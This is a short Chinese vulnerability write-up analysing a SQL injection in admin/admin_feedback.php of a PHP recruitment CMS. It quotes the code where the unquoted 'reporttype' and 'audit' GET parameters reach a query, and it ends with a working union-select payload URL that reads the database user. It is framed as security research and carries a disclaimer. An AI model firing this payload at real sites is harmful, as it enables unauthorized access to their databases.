漏洞文件:admin/admin_feedback.php
代码82行:
if (!empty($_GET['reporttype'])) { $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype']; } if (!empty($_GET['audit'])) { $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit']; } $total_val=$db->get_total($total_sql); $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET)); $currenpage=$page->nowindex; $offset=($currenpage-1)*$perpage; $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type); $smarty->assign('pageheader',"举报信息"); $smarty->assign('list',$list); $smarty->assign('page',$page->show(3));
跟下get_report_list:
function get_report_list($offset,$perpage,$get_sql= '',$type) { global $db; $limit=" LIMIT ".$offset.','.$perpage; if($type==1){ $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit); while($row = $db->fetch_array($result)) { $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id'])); $row_arr[] = $row; } }else{ $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit); while($row = $db->fetch_array($result)) { $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id'])); $row_arr[] = $row; } } return $row_arr; }
$_GET['reporttype']
$_GET['audit']
没有’包含。
构造payload:
admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论